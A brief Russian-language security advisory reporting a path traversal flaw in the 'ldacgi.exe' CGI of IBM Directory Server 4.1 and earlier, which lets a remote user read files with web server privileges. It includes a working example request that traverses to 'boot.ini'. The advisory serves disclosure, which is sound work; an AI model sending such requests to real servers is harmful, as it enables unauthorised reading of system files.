Программа: IBM Directory Server 4.1 и более ранние
версии
Уязвимость в IBM Directory Server в 'ldacgi.exe' позволяет удаленному пользователю просматривать файлы на целевой системе с привилегиями Web сервера.
Пример:
http://myserver/ldap/cgi-bin/ldacgi.exe?Action= Substitute&Template=../../../../../boot.ini&Sub=
LocalePath&LocalePath=enus1252